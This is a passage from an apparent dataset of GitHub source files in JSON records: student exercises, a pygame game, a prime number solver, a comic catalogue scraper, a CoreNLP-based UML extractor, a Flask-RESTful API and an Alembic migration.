abs(r)\n\n draw_head(surface, x + 3 * r, y - 2 * r0, r)\n\n # body\n ellipse(surface, WHITE, [x + 8 * r * s, y, 8 * r0, 16 * r0], 0)\n ellipse(surface, BLACK, [x + 8 * r * s, y, 8 * r0, 16 * r0], 1)\n\n draw_hole(surface, x + 19 * r, y + 12 * r0, 2 * r)\n\n # fishing rod\n line(surface, BLACK, (x + 8 * r + r // 2, y + 7 * r0), (x + 18 * r + r // 2, y - 3 * r0), 5)\n line(surface, BLACK, (x + 18 * r, y - 3 * r0 + r0 // 2), (x + 18 * r, y + 12 * r0), 1)\n\n # hand\n ellipse(surface, WHITE, [x + 6 * r + 5 * r * s, y + 4 * r0, 5 * r0, 2 * r0], 0)\n ellipse(surface, BLACK, [x + 6 * r + 5 * r * s, y + 4 * r0, 5 * r0, 2 * r0], 1)\n\n # leg\n ellipse(surface, WHITE, [x + 4 * r + 6 * r * s, y + 12 * r0, 6 * r0, 4 * r0], 0)\n ellipse(surface, BLACK, [x + 4 * r + 6 * r * s, y + 12 * r0, 6 * r0, 4 * r0], 1)\n ellipse(surface, WHITE, [x + 8 * r + r // 2 + 3 * r * s, y + 14 * r0, 3 * r0, 2 * r0], 0)\n ellipse(surface, BLACK, [x + 8 * r + r // 2 + 3 * r * s, y + 14 * r0, 3 * r0, 2 * r0], 1)\n\n\npygame.init()\n\nFPS = 30\nscreen = pygame.display.set_mode((700, 900))\n\n# background\nrect(screen, SKY, (0, 0, 700, 450))\nrect(screen, WHITE, (0, 450, 700, 450))\nline(screen, BLACK, (0, 450), (700, 450), 1)\n\ndraw_sun(500, 200, 190)\n\nbear = screen.subsurface([0, 0, 700, 900])\npositions = [[20, 450, 10], [100, 730, 15], [650, 550, -10]]\nfor pos in positions:\n draw_bear(bear, pos[0], pos[1], pos[2])\n\npygame.display.update()\nclock = pygame.time.Clock()\nfinished = False\n\nwhile not finished:\n clock.tick(FPS)\n pygame.display.update()\n for event in pygame.event.get():\n if (event.type == pygame.QUIT) or (pygame.time.get_ticks() > 5000):\n finished = True\n\npygame.quit()","repo_name":"GrishkaYesenin/infa_2021_esenia","sub_path":"lab5/my_cool_dogs.py","file_name":"my_cool_dogs.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3036259591","text":"import sys\n\ninput = sys.stdin.readline\n\nM, N = map(int, input().split())\n\ndef is_prime_num(num):\n if num == 1:\n return False\n \n for i in range(2, int(num**0.5)+1):\n if num % i == 0:\n 
return False\n \n return True\n \n \nfor num in range(M, N+1):\n if is_prime_num(num):\n print(num)","repo_name":"MOONisYOUNG/Algorithms_Study","sub_path":"BOJ/no_1929_Prime_Number.py","file_name":"no_1929_Prime_Number.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13398833609","text":"#PROCESSING RANDOM TASKS\r\nimport asyncio\r\nimport time\r\nasync def Task_ex(n):\r\n time.sleep(1)\r\n print(\"Processing {}\".format(n))\r\nasync def Generator_task():\r\n for i in range(10):\r\n asyncio.ensure_future(Task_ex(i))\r\n int(\"Tasks Completed\")\r\n asyncio.sleep(2)\r\n\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(Generator_task())\r\nloop.close()\r\n#CODE BY AYUSH SAXENA","repo_name":"ayush-29byte/APP-LAB-SOLUTIONS","sub_path":"event driven 4.py","file_name":"event driven 4.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"19600066394","text":"import ast\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom clustering import lat2y, lon2x\nfrom nl_airspace_def import ehaa_airspace\nfrom timesnapshots import cut_interval\n\nif __name__ == \"__main__\":\n data_date = '20180101'\n clusters_to_analyse = [48, 51]\n n_data_points = 200\n with open('data/clustered/eham_{0}.csv'.format(data_date), 'r') as fp:\n parameters = ast.literal_eval(fp.readline())\n df_all = pd.read_csv(fp)\n df_all.sort_values(by=['cluster', 'ts'], inplace=True)\n airspace_query = \"airport=='{}'\".format(\"EHAM\")\n airspace = ehaa_airspace.query(airspace_query)\n\n airspace_x = lon2x(airspace[airspace['type'] == 'CTR'].geometry.centroid.x).iloc[0]\n airspace_y = lat2y(airspace[airspace['type'] == 'CTR'].geometry.centroid.y).iloc[0]\n df_all['x'] = lon2x(df_all['lon'].values) - airspace_x\n df_all['y'] = lat2y(df_all['lat'].values) - airspace_y\n df_all['dist_to_airport'] = np.sqrt((df_all['x']) ** 2 + (df_all['y']) ** 2) / 1852\n df_all['FL'] = df_all['alt']/100\n df_all['trk_rad'] = np.deg2rad(df_all['trk'])\n for cluster_n in clusters_to_analyse:\n df = df_all.query('cluster==@cluster_n')\n # df_by_interval = cut_interval(df, 3600).reset_index().set_index(['interval', 'fid', 'ts'])\n # fid_per_interval = df_by_interval.groupby(by='interval')['fid'].unique().apply(len)\n tracks_in_cluster = len(df['fid'].unique())\n print(\"Analysing cluster(s) {0} (n_tracks={1})\".format(cluster_n, tracks_in_cluster))\n fid_start_stop_times = []\n for fid, track_points in df.groupby('fid'):\n fid_start_stop_times.append([fid, track_points['ts'].min(), track_points['ts'].max()])\n assert len(track_points) >= n_data_points\n resampling_indices = np.round(np.linspace(0, len(track_points) - 1, n_data_points)).astype('int')\n df.loc[track_points.index[resampling_indices], 'index_along_track'] = list(range(n_data_points))\n # Stupid SettingWithCopyWarning\n assert np.all(df.loc[track_points.index[resampling_indices], 'index_along_track'] >= 0)\n df_start_stop_times = pd.DataFrame.from_records(fid_start_stop_times, columns=['fid', 't0', 'tend'])\n df_start_stop_times['duration'] = df_start_stop_times['tend'] - df_start_stop_times['t0']\n\n break\n #\n # df_downsampled = df.query('index_along_track >= 0')\n # points_along_track = df_downsampled.groupby('index_along_track')\n # fields = ['x', 'y', 'alt', 'gs']\n # df_along_track = 
points_along_track.mean()[fields].merge(points_along_track[fields].quantile(q=0.0), suffixes=['', '_l'], right_index=True, left_index=True)\n # df_along_track = df_along_track.merge(points_along_track[fields].quantile(q=1), suffixes=['', '_u'], right_index=True, left_index=True)\n #\n # plt.figure()\n # ax = df_along_track.plot(x='x', y='y')\n # ax.fill_between(df_along_track['x_l'], df_along_track['y_l'], df_along_track['y_u'], alpha=0.5, step='mid', color='C0')\n # ax.fill_between(df_along_track['x_u'], df_along_track['y_l'], df_along_track['y_u'], alpha=0.5, step='mid', color='C0')\n # ax.fill_betweenx(df_along_track['y_l'], df_along_track['x_l'], df_along_track['x_u'], alpha=0.5, step='mid', color='C0')\n # ax.fill_betweenx(df_along_track['y_u'], df_along_track['x_l'], df_along_track['x_u'], alpha=0.5, step='mid', color='C0')\n # plt.legend(['mean', 'total area'])\n # plt.show()\n #\n # plt.figure()\n # ax = df_along_track.plot(y='alt',color='C3')\n # ax.fill_between(df_along_track.index, df_along_track['alt_l'], df_along_track['alt_u'])\n # plt.show()\n #\n # plt.figure()\n # ax = df_along_track.plot(y='gs',color='C3')\n # ax.fill_between(df_along_track.index, df_along_track['gs_l'], df_along_track['gs_u'])\n # plt.show()\n #\n","repo_name":"salomonsters/thesis","sub_path":"camda.py","file_name":"camda.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16061158984","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom util.image_utils import show_image, merge_images\nfrom util.image_utils import def_image\nfrom util.image_utils import canny_edge_threshold\nfrom util.image_utils import show_image_matrix\n\n\ndef main():\n\n cherry = def_image('../data/cherry.jpg')\n apple = def_image('../data/red_apple.jpg')\n image_gray_cherry = cv2.cvtColor(cherry, cv2.COLOR_BGR2GRAY)\n single_cherry_edges = canny_edge_threshold(image_gray_cherry, 100, 30)\n image_gray_apple = cv2.cvtColor(apple, cv2.COLOR_BGR2GRAY)\n single_apple_edges = canny_edge_threshold(image_gray_apple, 100, 50)\n images = [cherry, single_cherry_edges, apple, single_apple_edges]\n show_image_matrix(2, images)\n new_image = merge_images(cherry, apple)\n hole_image_edges = canny_edge_threshold(new_image, 100, 50)\n apple_part = new_image[0:800, 1300:2200]\n cherry_part = new_image[0:800, 0:1050]\n apple_gray = cv2.cvtColor(apple_part, cv2.COLOR_BGR2GRAY)\n apple_edges = canny_edge_threshold(apple_gray, 100, 50)\n apple_edge_number = np.count_nonzero(apple_edges)\n print(\"Number of edges in apple = \", apple_edge_number)\n cherry_gray = cv2.cvtColor(cherry_part, cv2.COLOR_BGR2GRAY)\n cherry_edges = canny_edge_threshold(cherry_gray, 100, 50)\n cherry_edge_number = np.count_nonzero(cherry_edges)\n print(\"Number of edges in cherry = \", cherry_edge_number)\n images = (new_image, hole_image_edges, apple_edges, cherry_edges)\n show_image_matrix(2,images)\n print(\"Upper threshold value = 100\")\n print(\"Lower threshold value = 50\")\n\n if cherry_edge_number > apple_edge_number:\n show_image(cherry_part, \"The fruit is cherry\")\n show_image(apple_part, \"The fruit is apple\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mertozgumuss/GOHM_Internship","sub_path":"src/edge_detection_week2.py","file_name":"edge_detection_week2.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"40095316183","text":"import subprocess\nfrom stanfordcorenlp import StanfordCoreNLP\nimport logging\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tree import Tree\nfrom nltk import stem\n\n# word lists\nstop_words = [\n 'i',\n 'me',\n 'my',\n 'myself',\n 'we',\n 'our',\n 'ours',\n 'ourselves',\n 'you',\n 'your',\n 'yours',\n 'yourself',\n 'yourselves',\n 'he',\n 'him',\n 'his',\n 'himself',\n 'she',\n 'her',\n 'hers',\n 'herself',\n 'it',\n 'its',\n 'itself',\n 'themselves',\n 'what',\n 'who',\n 'whom',\n 'this',\n 'these',\n 'those',\n 'examples',\n 'but',\n 'because',\n 'until',\n 'while',\n 'at',\n 'about',\n 'between',\n 'if',\n 'with',\n 'through',\n 'during',\n 'after',\n 'above',\n 'below',\n 'up',\n 'down',\n 'able',\n 'form',\n 'of',\n 'off',\n 'over',\n 'under',\n 'again',\n 'further',\n 'then',\n 'once',\n 'here',\n 'there',\n 'where',\n 'why',\n 'how',\n 'all',\n 'both',\n 'each',\n 'few',\n 'most',\n 'other',\n 'some',\n 'no',\n 'nor',\n 'not',\n 'only',\n 'own',\n 'same',\n 'than',\n 'too',\n 'very',\n 's',\n 't',\n 'just',\n 'don',\n \"don't\",\n 'should',\n 'now',\n 'd',\n 'll',\n 'm',\n 'o',\n 're',\n 've',\n 'y',\n 'ain',\n 'aren',\n \"aren't\",\n 'couldn',\n 'didn',\n 'doesn',\n \"doesn't\",\n 'hadn',\n 'hasn',\n 'haven',\n 'isn',\n 'ma',\n 'mightn',\n 'mustn',\n 'needn',\n 'shan',\n 'shouldn',\n 'wasn',\n \"wasn t\",\n 'weren',\n 'weren t',\n 'won',\n 'won t',\n 'wouldn',\n 'wouldn t',\n 'multiple',\n 'many',\n 'forward',\n 'etc',\n 'shall',\n 'also',\n 'therefore',\n 'might',\n 'able',\n 'various',\n 'necessary',\n 'several',\n 'usually',\n 'must',\n 'finally',\n 'different',\n 'firstly',\n 'corresponding',\n 'enough',\n 'relevant',\n '’s',\n 'furthermore',\n 'desired',\n 'typically',\n 'initially',\n 'additional',\n]\n\nsto_words_further = [\n 'their',\n 'such',\n 'as',\n 'them',\n 'will',\n 'that',\n 'when',\n 'they',\n 'for',\n 'may',\n 'types',\n 'specific',\n 'particular',\n]\n\n\ncomposition_word = [\n 'have',\n 'has',\n 'contains',\n 'contain',\n 'contained',\n 'composed of',\n 'maintain',\n 'maintains',\n 'maintained',\n 'consists of',\n 'hold',\n 'holds',\n 'held',\n 'include',\n 'includes',\n 'included',\n 'divided to',\n 'has part',\n 'comprise',\n 'carry',\n 'involve',\n 'imply',\n 'embrace',\n 'is for',\n 'consist',\n 'consists',\n]\n\n# subtyping_word = ['is a', 'is a kind of', 'are', 'are classified as', 'can be', 'is classified as']\n\nsubtyping_word = ['is a', 'is a kind of', 'is', 'can be', 'are', 'can involve', 'be']\n\ndesign_elements = ['system', 'user', 'application', 'data', 'computer', 'object', 'information', 'interface', 'online']\n\nattribute_words = [\n 'id',\n 'first name',\n 'last name',\n 'name',\n 'address',\n 'email',\n 'number',\n 'no',\n 'code',\n 'date',\n 'type',\n 'volume',\n 'birth',\n 'password',\n 'price',\n 'quantity',\n 'location',\n 'maximum temperature',\n 'resolution date',\n 'creation date',\n 'crime code',\n 'course name',\n 'time slot',\n 'quantities',\n 'delivery date',\n 'prices',\n 'delivery address',\n 'scanner',\n 'till',\n 'illness conditions',\n 'diagnostic result',\n 'suggestions',\n 'birth date',\n 'order number',\n 'total cost',\n 'entry date',\n 'delivery status',\n 'description',\n 'product number',\n]\n\n# settings\nclass SubStanfordCoreNLP(StanfordCoreNLP):\n def __init__(self, path_or_host, port=None, memory='4g', lang='en', quiet=True, logging_level=logging.WARNING):\n super(SubStanfordCoreNLP, self).__init__(path_or_host, port, memory, lang, quiet, logging_level)\n\n def open_ie(self, 
sentence):\n r_dict = self._request('openie', sentence)\n openies = [(ie['subject'], ie['relation'], ie['object']) for s in r_dict['sentences'] for ie in s['openie']]\n return openies\n\n\nnlp = SubStanfordCoreNLP('https://corenlp.semax.nguml.com', port=443)\n\nlemmatizer = stem.WordNetLemmatizer()\n\n\n# check attribute and return in dic or lst\ndef check_attr(s):\n \"\"\"Check if subject or object belongs to attribute and act accordingly.\n\n Args:\n - s (tuple): [0]: subject, [1]: relation, [2]: object\n \"\"\"\n cls = {'Class': set(), 'Attribute': []}\n # check if object belongs to attribute and subject doesn't belong to attribute\n if s[0] in attribute_words and s[0] not in cls['Attribute']:\n cls['Attribute'].append(s[0])\n c = lemmatizer.lemmatize(s[2], pos='n').capitalize()\n cls['Class'] = c\n return cls\n\n # check if subject belongs to attribute and object belongs to class\n elif s[2] in attribute_words and s[2] not in cls['Attribute']:\n cls['Attribute'].append(s[2])\n c = lemmatizer.lemmatize(s[0], pos='n').capitalize()\n cls['Class'] = c\n return cls\n else:\n # Both are not a attribute so return two classes\n c1 = lemmatizer.lemmatize(s[0], pos='n').capitalize()\n c2 = lemmatizer.lemmatize(s[2], pos='n').capitalize()\n return [{'Class': c1, 'Attribute': []}, {'Class': c2, 'Attribute': []}]\n\n\n# direction extract\ndef get_dir2(s):\n \"\"\"Get direction for relations.\"\"\"\n dir = {'from': set(), 'to': set()}\n raw_cls = [s[0], s[2]]\n raw_dir = []\n\n if s[0] in attribute_words or s[2] in attribute_words:\n raw_cls.clear()\n return None\n else:\n for words in raw_cls:\n words = words.split(' ')\n a = []\n for w in words:\n neww = lemmatizer.lemmatize(w, pos='n').capitalize()\n a.append(neww)\n b = ''.join(a)\n raw_dir.append(b)\n\n # using dependency parser to check and define direction between classes\n tri = list(s)\n joint_s = ' '.join(tri)\n dep = nlp.dependency_parse(joint_s)\n\n firstelement = []\n for d in dep:\n if d[0] not in firstelement:\n firstelement.append(d[0])\n\n if raw_dir[0] != raw_dir[1]:\n if 'nsubj' in firstelement:\n dir['from'] = raw_dir[0]\n dir['to'] = raw_dir[1]\n elif 'nsubjpass' in firstelement:\n dir['from'] = raw_dir[1]\n dir['to'] = raw_dir[0]\n else:\n dir['from'] = raw_dir[0]\n dir['to'] = raw_dir[1]\n\n return dir\n\n else:\n return None\n\n\n# relationship extraction\ndef get_rels2(s):\n \"\"\"Define the relations for sentences.\n\n Args:\n - s (string): sentence with relations.\n \"\"\"\n rel = {}\n # using dependecny parser to check active and passive voice\n tri = list(s)\n joint_s = ' '.join(tri)\n dep = nlp.dependency_parse(joint_s)\n\n firstelement = []\n for d in dep:\n if d[0] not in firstelement:\n firstelement.append(d[0])\n\n convertrel = []\n if 'nsubjpass' in firstelement:\n pos = nlp.pos_tag(s[1])\n for p in pos:\n if p[1] == 'VBN':\n convertrel.append(p[0])\n # using lemmatizer to transfer passive verb to active\n relname = lemmatizer.lemmatize(convertrel[0], pos='v')\n if relname in composition_word:\n rel['Composition'] = relname\n elif relname in subtyping_word:\n rel['Subtyping'] = ''\n else:\n rel['Association'] = relname\n\n else:\n if s[1] in composition_word:\n rel['Composition'] = s[1]\n elif s[1] in subtyping_word:\n rel['Subtyping'] = ''\n else:\n rel['Association'] = s[1]\n return rel\n\n\n# multiplicity extraction\ndef get_multi():\n # set default multiplicity results as the widest range '*'\n multi = {'multiplicity': ['*', '*']}\n return multi\n\n\n# subtyping multiplicity\ndef get_multi2():\n multi = 
{'multiplicity': ['', '']}\n return multi\n\n\n# composition multiplicity\ndef get_multi3():\n multi = {'multiplicity': ['1', '*']}\n return multi\n\n\n# check if object belongs to VBN\ndef obj_obj(s):\n \"\"\"Check object of sentence.\n\n Remove the object if it is a verb past participle (VBN)\n\n Args:\n s (arr[str]): with subject, action and object of the sentence\n\n Returns:\n update (arr[str]): subject, action and if it exists an object.\n \"\"\"\n new = []\n update = []\n lst = [s[0], s[1]]\n obj = nlp.pos_tag(s[2])\n\n # print(obj)\n for i in obj:\n if i[1] != 'VBN':\n new.append(i[0])\n word = ' '.join(new)\n if word != '':\n lst.append(word)\n update = lst\n return update\n\n\n# if openie fails\ndef get_triple(s):\n tri_lst = []\n try:\n np = s[0]\n vp = s[1]\n\n qnp = [np]\n while qnp:\n nps = qnp.pop(0)\n for ns in nps:\n if ns.label() == 'NP':\n qnp.append(ns)\n elif ns.label() in ['NN', 'NNS', 'NNP']:\n tri_lst.append(ns.leaves()[0])\n qvp = [vp]\n while qvp:\n vbs = qvp.pop(0)\n for vs in vbs:\n if vs.label() in ['VP', 'NP', 'PP']:\n qvp.append(vs)\n elif vs.label() in ['VB', 'VBN', 'VBZ']:\n tri_lst.append(vs.leaves()[0])\n elif vs.label() in ['NN', 'NNS', 'NNP']:\n tri_lst.append(vs.leaves()[0])\n except Exception as _:\n print(s)\n triple = tuple(tri_lst)\n return triple\n\n\n# Read file\n# lowercase, and concatenating paragraphs\ndef get_lines(file_path):\n \"\"\"Retrieve lines from file.\n\n Reads the file and lowercases everything and concatenates the different paragraphs.\n\n Args:\n file_path (str): path to the file with text.\n\n Returns:\n str: Containing all the text.\n \"\"\"\n with open(file_path, 'r') as f:\n raw_data = f.read().lower()\n lines = raw_data.split('\\n')\n filtered_lines = [s for s in lines if s != '']\n initial_text = ' '.join(filtered_lines)\n # print(initial_text)\n return initial_text\n\n\ndef remove_design_elements(sent):\n \"\"\"Remove design elements from the sentence.\"\"\"\n tokens = nlp.word_tokenize(sent)\n # print(tokens)\n filtered_tokens = [token for token in tokens if token not in design_elements]\n line = ' '.join(filtered_tokens)\n return line\n\n\ndef remove_stopwords(line):\n \"\"\"Remove stopwords for openie.\"\"\"\n word = nlp.word_tokenize(line)\n filtered_stop = [w for w in word if w not in stop_words]\n ie_sent = ' '.join(filtered_stop)\n # print(ie_sent)\n return ie_sent\n\n\ndef remove_other_stopwords(item):\n \"\"\"Remove other stopwords from openie item.\"\"\"\n new_item = []\n for word in item:\n filtered_word = nlp.word_tokenize(word)\n update_word = [i for i in filtered_word if i not in sto_words_further]\n\n update_tri = ' '.join(update_word)\n new_item.append(update_tri)\n return new_item\n\n\n# text pre-processing\ndef preprocessing(text):\n \"\"\"Preprocess the input text.\n\n Remove stopwords, design elements and more stopwords\n Args:\n text (str): requirements.\n\n Returns:\n standard_txt (str): text removed from the stop words and design elements.\n \"\"\"\n standard_txt = []\n initial_text = text\n sents = sent_tokenize(initial_text)\n\n # preprocessing sentence by sentence\n for s in sents:\n line = remove_design_elements(s)\n ie_sent = remove_stopwords(line)\n ies = nlp.open_ie(ie_sent)\n # print(ies)\n process_ies = []\n for item in ies:\n new_item = remove_other_stopwords(item)\n\n if '' not in new_item:\n #\n new = obj_obj(new_item)\n if len(new) != 0:\n new1 = tuple(new)\n process_ies.append(new1)\n\n # print(process_ies)\n\n # if openie fails\n if len(ies) == 0:\n parser = nlp.parse(ie_sent)\n tree = 
Tree.fromstring(parser)\n root = tree[0]\n triple = get_triple(root)\n standard_txt.append(triple)\n else:\n for eachies in process_ies:\n if eachies not in standard_txt:\n standard_txt.append(eachies)\n\n return standard_txt\n\n\n# add\ndef generate_uml(text):\n \"\"\"\n\n Args:\n text (str): Filepath of the requirements text file\n \"\"\"\n data = preprocessing(text)\n objectDict = {}\n sum = []\n clsoutput = ''\n sumoutput = ''\n subtypes = {}\n\n for s in data:\n check = check_attr(s)\n # s looks like it is an open ie\n\n if isinstance(check, dict):\n raw_cls = [check['Class']]\n raw_dir = []\n for words in raw_cls:\n # get lemmatization of each word in class\n words = words.split(' ')\n a = []\n for w in words:\n neww = lemmatizer.lemmatize(w, pos='n').capitalize()\n a.append(neww)\n b = ''.join(a)\n raw_dir.append(b)\n # 不在,存入\n if raw_dir[0] not in objectDict:\n id = raw_dir[0]\n objectDict[id] = {}\n objectDict[id]['Class'] = raw_dir[0]\n objectDict[id]['Attribute'] = check['Attribute']\n # 在\n else:\n if raw_dir[0] not in objectDict[raw_dir[0]]['Attribute']:\n # objectDict[check['Class']]['Attribute'].append(check['Atrribute'][0])\n objectDict[raw_dir[0]]['Attribute'].extend(check['Attribute'])\n else:\n\n for item in check:\n raw_cls = [item['Class']]\n raw_dir = []\n for words in raw_cls:\n words = words.split(' ')\n a = []\n for w in words:\n neww = lemmatizer.lemmatize(w, pos='n').capitalize()\n a.append(neww)\n b = ''.join(a)\n raw_dir.append(b)\n # print(raw_dir)\n # 不在\n if raw_dir[0] not in objectDict:\n id = raw_dir[0]\n objectDict[id] = {}\n objectDict[id]['Class'] = raw_dir[0]\n objectDict[id]['Attribute'] = []\n\n e = get_dir2(s)\n dir2 = e\n\n if dir2 is not None:\n r = get_rels2(s)\n rels2 = r\n keys = list(rels2)\n if keys[0] == 'Subtyping':\n m = get_multi2()\n multi2 = m\n subtypes[str(dir2['from'])] = dir2['to']\n elif keys[0] == 'Composition':\n m = get_multi3()\n multi2 = m\n else:\n m = get_multi()\n multi2 = m\n sum.append(list(rels2.items()) + list(dir2.items()) + list(multi2.items()))\n\n # format to display in textarea\n for item in objectDict.items():\n a = 'Class: ' + item[0] + '\\n'\n a += ' Attribute: ' + str(item[1]['Attribute'])\n clsoutput += a + '\\n'\n\n for s in sum:\n r = '\\n' + '\\n' + '{}: {}'.format(s[0][0], s[0][1])\n d1 = '\\n' + '{}: {}'.format(s[1][0], s[1][1])\n m1 = '\\n' + ' {}: {}'.format(s[3][0], s[3][1][0])\n d2 = '\\n' + '{}: {}'.format(s[2][0], s[2][1])\n m2 = '\\n' + ' {}: {}'.format(s[3][0], s[3][1][1])\n sumoutput += r + d1 + m1 + d2 + m2\n\n output = clsoutput + sumoutput\n return objectDict, sum, subtypes, output\n","repo_name":"yhu02/LIACS","sub_path":"year3/SWE/ngUML.component.backend/nguml/classes/nlp/corenlp.py","file_name":"corenlp.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"9888031121","text":"import pygame\r\n\r\n# constants\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\nGAME_FPS = 60\r\nGAME_CLOCK = pygame.time.Clock()\r\nBACKGROUND_COLOR = (0, 0, 50)\r\nBACKGROUND_IMG_LOC = \"media/background.png\"\r\nBACKGROUND_IMG = pygame.image.load(BACKGROUND_IMG_LOC)\r\nBACKGROUND_MUSIC_LOC = \"media/background.wav\"\r\n\r\nGAME_CAPTION = \"Space Invaders\"\r\nGAME_ICON = \"media/game_icon.png\"\r\n\r\nPLAYER_IMAGE_LOC = \"media/player.png\"\r\nPLAYER_IMG = pygame.image.load(PLAYER_IMAGE_LOC)\r\nPLAYER_IMG_WIDTH = PLAYER_IMG.get_width()\r\nPLAYER_IMG_HEIGHT = PLAYER_IMG.get_height()\r\nPLAYER_X_INIT = (SCREEN_WIDTH 
/ 2) - (PLAYER_IMG_WIDTH / 2) # half on screen x-axis\r\nPLAYER_Y_INIT = (SCREEN_HEIGHT * .8) + (PLAYER_IMG_HEIGHT / 2) # 3/4 down on screen y-axis\r\nPLAYER_VELOCITY = 4 # pixels per tick\r\nPLAYER_BULLET_INTERVAL = 300 # milliseconds between firing a bullet\r\n\r\nENEMY_IMG_LOC = \"media/alien.png\"\r\nENEMY_DEATH_SOUND_LOC = \"media/explosion.wav\"\r\nENEMY_IMG = pygame.image.load(ENEMY_IMG_LOC)\r\nENEMY_IMG_WIDTH = ENEMY_IMG.get_width()\r\nENEMY_IMG_HEIGHT = ENEMY_IMG.get_height()\r\nENEMY_X_VELOCITY = 1.25 # pixels per tick\r\nENEMY_Y_VELOCITY = .2 # pixels per tick\r\n\r\nBULLET_IMG_LOC = \"media/bullet.png\"\r\nBULLET_FIRE_SOUND_LOC = \"media/laser.wav\"\r\nBULLET_IMG = pygame.image.load(BULLET_IMG_LOC)\r\nBULLET_IMG_WIDTH = BULLET_IMG.get_width()\r\nBULLET_IMG_HEIGHT = BULLET_IMG.get_height()\r\nBULLET_VELOCITY = 6\r\n\r\nSCORE_FONT_SIZE = int(SCREEN_WIDTH * .05)\r\nSCORE_FONT_COLOR = (255, 255, 255)\r\n# SCORE_FONT = pygame.font.Font('freesansbold.ttf', SCORE_FONT_SIZE)\r\nSCORE_TEXT_POS = (int(SCREEN_WIDTH * .0125), int(SCREEN_HEIGHT * .0125))\r\n\r\nimport point\r\nimport random\r\nimport enemy\r\nimport bullet\r\nimport player\r\nfrom pygame import mixer\r\n","repo_name":"abhishekir/SpaceInvaders","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43376322636","text":"from db import db\n\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\nfrom model.products import Snaps\n\nclass VersionId(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('current',\n type=dict,\n required=True,\n help=\"This filed cannot be left blank!\"\n )\n\n def get(self, name):\n products = Snaps()\n product = products.query.filter_by(version_id=name).first()\n result = {}\n if product:\n for item in product.dp:\n result[item.version_id] = [item.version, item.product_id]\n return result, 200\n return {'message': \"No item to GET.\"}, 404\n\n @jwt_required() #must autheticate before calling GET\n def post(self, name):\n # import pdb; pdb.set_trace()\n products = Snaps()\n product = products.query.filter_by(version_id=name).first()\n if product:\n return {'message': \"An item with id '{}' already exists.\".format(name)}, 400 # bad request\n\n data = VersionId.parser.parse_args()\n Snaps.add_data(data, name)\n return {'message': \"Item successfuly POSTed\"}, 201\n\n # except:\n # return {\"message\": \"An error occured inserting the item.\"}, 500 #Internal Server Error\n\n @jwt_required() #must autheticate before calling GET\n def delete(self, name):\n result = Snaps.remove_data(name)\n if result:\n return {'message': 'Item DELETED'}\n return {'message': 'Noting was deleted'}\n\n @jwt_required() #must autheticate before calling GET\n def put(self, name): # must be idempotent\n Snaps.remove_data(name)\n data = VersionId.parser.parse_args()\n Snaps.add_data(data, name)\n return {'message': \"PUT action was successfuly.\"}, 201\n\n\nclass ProductList(Resource):\n\n def get(self):\n products = Snaps()\n return {item.version_id: str(item.date_added) for item in products.query.all()}\n","repo_name":"uchenna-j-edeh/genericAPI","sub_path":"resources/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4949678106","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nurl = 
'https://www.dmzj.com/info/yaoshenji.html'\n\n\ndef getCatalogueAndLink(url):\n chapter = []\n chapterLink = []\n\n # step1: get html\n html = requests.get(url)\n\n # step2: parse\n soup = BeautifulSoup(html.text, 'lxml')\n title = soup.find_all('h1')[0].text\n ulList = soup.find_all('ul', class_='list_con_li autoHeight')\n soup = BeautifulSoup(str(ulList[1]), 'lxml')\n a_labelList = soup.find_all('a')\n for item in a_labelList:\n chapter.append(item.get('title'))\n chapterLink.append(item.get('href'))\n return title, chapter, chapterLink\n\n\ndef main():\n title, chapter, chapterLink = getCatalogueAndLink(url)\n # verification\n with open('%s.html' % title, 'w') as file:\n for i in range(len(chapter)):\n file.write(str(chapter[i])+' --> '+str(chapterLink[i])+'\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yiyah/spider","sub_path":"learn/image/dmzj/2_getCatalogue.py","file_name":"2_getCatalogue.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39929940368","text":"\"\"\"QQ\n\nRevision ID: 29d15d666661\nRevises: \nCreate Date: 2019-11-02 00:15:38.296658\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '29d15d666661'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('allineamenti',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('allineamento', sa.String(length=100), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('tipologie',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('tipologia', sa.String(length=100), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('personaggi',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('nome', sa.String(length=64), nullable=True),\n sa.Column('quantita', 